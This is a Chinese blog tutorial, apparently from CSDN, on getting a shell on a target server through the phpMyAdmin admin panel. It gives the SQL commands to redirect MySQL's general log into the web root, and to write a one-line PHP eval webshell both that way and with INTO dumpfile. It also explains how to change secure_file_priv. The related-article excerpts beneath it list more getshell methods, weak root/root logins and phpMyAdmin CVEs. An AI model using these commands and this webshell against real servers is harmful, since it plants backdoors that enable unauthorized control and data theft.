通过phpMyadmin后台获取shell(getshell)

最新推荐文章于 2024-09-11 20:05:26 发布
最新推荐文章于 2024-09-11 20:05:26 发布
阅读量2.6k 收藏 2
点赞数 3
分类专栏: 渗透 getshell 文章标签: mysql shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/110824020
版权

通过phpMyadmin后台获取shell

前提:
1.要知道靶机的mysql用户名和密码
2.能成功登录到靶机phpmyadmin中

先登入对方phpmyadmin

然后找到执行sql语句的框架
1.开启日志

set global general_log='on'

在这里插入图片描述2.指定日志写入的文件,就是一句话木马写入的路径

set global general_log_file ="C:/php/PHPTutorial/WWW/she.php"

注意:一定注意路径的斜杠一定是/不是复制的路径
在这里插入图片描述查看靶机根目录,发现创建成功
在这里插入图片描述3.写入一句话木马

select "<?php eval($_POST['x'])?>"

在这里插入图片描述访问一下
在这里插入图片描述然后获取shell
在这里插入图片描述4.模糊查询嗅探

SHOW VARIABLES LIKE 'general_log%' ;

在这里插入图片描述5.这是查看写入权限的值

SHOW VARIABLES LIKE "secure_file_priv"

在这里插入图片描述要是value为NULL 则代表无法导出
要是value为空值 则代表导出和导入没有限制
要是value为/www 则代表导出和导入只能到www目录中

6.修改secure_file_priv的方式
首先再mysql命令查看

show variables like '%secure%';

在这里插入图片描述

在my.ini下里的[mysqld] 加入 secure_file_priv =
文件位置

在这里插入图片描述添加
在这里插入图片描述重启phpstudy

然后开启
通过dumpfile导出 也可以 使用outfile写入
写入一句话

SELECT "<?php eval($_POST['x']); ?>" INTO dumpfile "C:/phpStudy/PHPTutorial/WWW/tt.php"

然后可以上传此目录

phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1947
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
phpmyadmin后台GetShell总结
做自己喜欢的事,并将其发挥到极致!
02-18 493
文章目录前言一、phpmyadmin简介二、phpmyadmin寻找、登录三、利用函数写入文件四、secure_file_priv函数五、日志文件写入Webshell六、通过慢查询方式getshell七、phpmyadmin4.8.1远程文件包含漏洞影响版本漏洞分析及复现漏洞防范 前言 文章仅用于技术学习与安全研究,切勿用于非授权下的渗透行为,出现任何后果与本文作者无关。 !!!且行且珍惜!!! 一、phpmyadmin简介 phpmyadmin是一个以PHP为基础,以web-base方式架构在网站
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
【getshellphpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 822
访问一下 最后getshell
第三方应用类---Phpmyadmin 后台 Getshell 操作
金灰的博客
04-21 537
以Web-Base方式架构在网站主机上的MySQL的数据库管理工具.PhpMyAdmin_百度百科。
phpmyadmin getshell
YouthBelief的博客
11-11 5189
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1132
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
PHPmyadmin Getshell
Grey的博客
07-21 6924
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读写文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常写入shell 我们首先需要检测的是MyS...
phpMyAdmin后台getshell复现
最新发布
09-18
phpMyAdmin后台getshell复现
复现phpmyadmin后台getshell
09-12
复现phpMyAdmin后台GetShell通常指的是利用phpMyAdmin的漏洞执行未授权的代码,从而获得对服务器的控制。这通常需要以下条件: 1. 存在已知漏洞:首先,phpMyAdmin需要存在可以被利用的已知安全漏洞。这可能是一个...
phpmyadmin爆破和后台getshell
谢公子的博客
12-09 6030
目录 phpmyadmin phpmyadmin后台的爆破 phpmyadmin后台GetShell into outfile写木马 利用日志文件Getshell phpmyadmin phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂...
【WEB安全】PHPMyAdmin后台GetShell姿势总结
网络安全知识分享
12-31 5022
PHPMyAdmin后台GetShell姿势总结前言:本地环境:数据库文件导出写入利用条件利用方式数据库全局日志写入利用条件利用方式数据库慢查询日志写入利用条件利用方式CVE-2018-12613利用条件利用方式CVE-2018-19968利用条件利用方式 前言: phpMyAdmin是一个以PHP为基础,以web方式架构在服务器上的MySQL的数据库管理工具。让管理者可以通过Web接口来管理MySQL数据库。因其基于Web的简便易操作的图形化界面备受网站管理者的喜爱。 当我们通过其它各类手段获取到MySQ
phpmyadmin拿网站shell
J_joker_的博客
11-16 903
时间:2018-11-15 ID:joker_vip(CSDN)     这是本人第一次在这个论坛发表学术文章,希望我的文章能够给一些新手一些帮助,如果有问题,希望大佬们能轻喷。因为我也是在校大学生,也是信息安全方面的爱好者,所以这些渗透只是也全是自学的,也希望有大佬指点指点我,带一带我。     这次的渗透是半运气+半技术的成果,首先在谷歌搜索引擎中批量查找存在PHP探针的网站,类似于下图...
渗透测试-PhpMyAdmin后台getshell
道阻且长,行则将至。
08-10 5387
在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshellMySQL导出木马 最常用的是通过into outfile直接写入一句话木马: select '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/xxx.php'; 当然,前...
phpmyadmin后台getshell( 4.8.5)
qq_61740845的博客
09-11 409
然后去浏览器访问一些我们文件,可以成功访问就可以使用远控(中国蚁剑)getshell了。然后改变它的日志存储位置方便上马(要根据实际情况更改路径)然后通过查询我们的一句话使日志里面出现我们的一句话。
登录phpmyadmin获取系统shell
R3332136304的博客
06-28 279
在对目标系统进行目录扫描时发现该web系统存在phpinfo信息泄露以及phpmyadmin管理后台 目录扫描工具为 dirsearch 访问 phpmyadmin 发现存在弱口令 root/root 由于 phpmyadmin 可以直接执行sql语句,所以想直接通过 phpmyadmin 执行 sql 语句读取文件以及写入 webshell。 执行 SHOW GLOBAL VARIABLES LIKE "%secure_file_priv%" 发现值为NULL,无写入读写文件权限。 mysql 数据库中
phpMyAdmin到getshell
weixin_44940180的博客
08-17 265
想要使用into outfile或者load_file需要先查看secure_file_priv 如果后面有路径,表示上传文件至某个路径 若为null,则表示不可以使用into outfile上传文件 如果在命令行直接设置,则会报错,表示它是一个只读变量 所以如果一旦这里为null,无法使用into outfile来上传后门 SHOW VARIABLES LIKE '%general%'; 查看日志文件功能是否开启以及文件路径 默认的样子 SET GLOBAL general_log='on'
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值